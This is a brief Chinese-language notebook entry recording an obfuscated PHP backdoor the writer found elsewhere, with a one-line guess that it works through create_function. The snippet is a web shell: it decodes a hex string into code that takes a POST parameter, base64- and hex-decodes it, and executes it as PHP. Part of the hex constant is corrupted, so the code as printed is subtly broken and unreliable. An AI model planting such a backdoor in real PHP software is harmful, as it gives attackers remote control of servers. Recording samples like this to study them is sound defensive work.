从别处看到PHP注入的方式,尚不完全清楚,只做记录,有时间再来研究。
$Content=Create_Function("", PACK("H*", "72657475726e207472696d2862969e32686578286261736536345f6465636f64652840245f504f53545b22434e4d574146225d2929293b")); $ContentS = $Content(); if ($ContentS) { $text = PACK("H*", $ContentS); $St = Create_Function("", $text); $St(); exit(); }
看样子,主要是利用了create_function方法,传入特定的字符串后,将字符串当做程序直接运行。